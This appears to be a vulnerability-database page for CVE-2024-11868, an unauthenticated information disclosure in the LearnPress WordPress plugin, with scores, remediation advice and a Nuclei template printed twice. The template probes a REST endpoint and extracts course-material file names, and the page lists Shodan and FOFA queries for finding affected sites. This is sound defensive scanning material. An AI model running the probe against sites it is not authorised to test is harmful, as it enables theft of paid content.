LearnPress < 4.2.7.4 - Course Material - Information Disclosure

CVE-2024-11868

Verified

Description

LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by insecure handling in class-lp-rest-material-controller.php, letting unauthenticated attackers extract paid course material, exploit requires no authentication.

Severity

Medium

CVSS Score

5.3

Exploit Probability

19%

Affected Product

learnpress

Published Date

February 7, 2026

Template Author

pussycat0x

CVE-2024-11868.yaml

id: CVE-2024-11868

info:
  name: LearnPress < 4.2.7.4 - Course Material - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by insecure handling in class-lp-rest-material-controller.php, letting unauthenticated attackers extract paid course material, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access and extract sensitive paid course content, leading to intellectual property theft and privacy breaches.
  remediation: Update to the latest version beyond 4.2.7.3 or apply security patches provided by the vendor.
  reference:
    - https://wpscan.com/vulnerability/7524ffd8-3506-48f7-89b6-d07b40533756/8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11868
    epss-score: 0.19196
    epss-percentile: 0.95444
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wp-plugin,wp-scan,learnpress,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/material/item-materials/1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status"'
        condition: and

      - type: word
        part: body
        words:
          - '"success"'
          - '"message"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - 'rest_no_route'
          - 'No route was found'
        negative: true
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: material_file
        part: body
        regex:
          - '"file_name"\s*:\s*"([^"]+)"'
        group: 1
# digest: 4a0a00473045022100ad32b603f803107ec009be7f94297bac0635589050894175ea5b1f0f46fb05920220401e24a21412df530bb8af9f4fae5898e0a46cb7be18079197a8f72f21aa0de2:922c64590222798bb761d5b6d8e72950

5.3Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVE ID:

cve-2024-11868

CWE ID:

cwe-284

References

https://wpscan.com/vulnerability/7524ffd8-3506-48f7-89b6-d07b40533756/8

Remediation Steps

Update to the latest version beyond 4.2.7.3 or apply security patches provided by the vendor.

id: CVE-2024-11868

info:
  name: LearnPress < 4.2.7.4 - Course Material - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    LearnPress – WordPress LMS Plugin contains a sensitive information exposure caused by insecure handling in class-lp-rest-material-controller.php, letting unauthenticated attackers extract paid course material, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access and extract sensitive paid course content, leading to intellectual property theft and privacy breaches.
  remediation: Update to the latest version beyond 4.2.7.3 or apply security patches provided by the vendor.
  reference:
    - https://wpscan.com/vulnerability/7524ffd8-3506-48f7-89b6-d07b40533756/8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-11868
    epss-score: 0.19196
    epss-percentile: 0.95444
    cwe-id: CWE-284
  metadata:
    verified: true
    max-request: 1
    vendor: thimpress
    product: learnpress
    framework: wordpress
    publicwww-query: "/wp-content/plugins/learnpress/"
    fofa-query: body="/wp-content/plugins/learnpress/"
    shodan-query: http.html:"/wp-content/plugins/learnpress/"
  tags: cve,cve2024,wordpress,wp-plugin,wp-scan,learnpress,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/lp/v1/material/item-materials/1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status"'
        condition: and

      - type: word
        part: body
        words:
          - '"success"'
          - '"message"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - 'rest_no_route'
          - 'No route was found'
        negative: true
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: material_file
        part: body
        regex:
          - '"file_name"\s*:\s*"([^"]+)"'
        group: 1
# digest: 4a0a00473045022100ad32b603f803107ec009be7f94297bac0635589050894175ea5b1f0f46fb05920220401e24a21412df530bb8af9f4fae5898e0a46cb7be18079197a8f72f21aa0de2:922c64590222798bb761d5b6d8e72950

LearnPress < 4.2.7.4 - Course Material - Information Disclosure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

LearnPress < 4.2.7.4 - Course Material - Information Disclosure

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps